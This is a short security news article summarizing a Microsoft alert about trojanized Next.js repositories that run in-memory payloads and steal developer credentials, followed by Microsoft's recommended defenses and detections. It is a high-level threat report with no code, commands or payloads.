Microsoft Alerts Developers of Malicious Next.js Repositories Used in Ongoing Hacker Attacks

The latest Microsoft alert shines a light on a sophisticated threat actor group that disguises malicious code as ordinary Next.js starter projects. By embedding payloads in files such as .vscode/tasks.json, next.config.js, and even trojanized jquery.min.js, the attackers trigger execution during workspace opening, npm dev runs, or server startup. Once a developer runs the code, a lightweight Stage 1 script contacts a Vercel‑hosted endpoint, registers the host, and pulls additional JavaScript that runs entirely in memory, bypassing traditional file‑based detection.

This campaign exploits the trust developers place in open‑source repositories and automated tooling. The use of recruiting‑themed assessments blends seamlessly into hiring pipelines, making it difficult for teams to distinguish benign code from malicious. The resulting command‑and‑control loop not only provides remote code execution but also harvests sensitive environment variables, exposing cloud credentials, database passwords, and API tokens. Such supply‑chain compromises can cascade across development, testing, and production environments, amplifying the potential impact beyond a single workstation.

Microsoft recommends a multi‑layered defense: enable Visual Studio Code’s Workspace Trust and Restricted Mode, scrutinize automation files before granting execution rights, and apply Attack Surface Reduction rules on Windows endpoints. Security teams should deploy advanced hunting queries targeting Node.js outbound traffic to Vercel domains and anomalous eval or new Function usage. Integrating these detections into Sentinel or other SIEM platforms ensures rapid identification of malicious repository activity, helping organizations safeguard their developer ecosystem and prevent credential leakage at the source.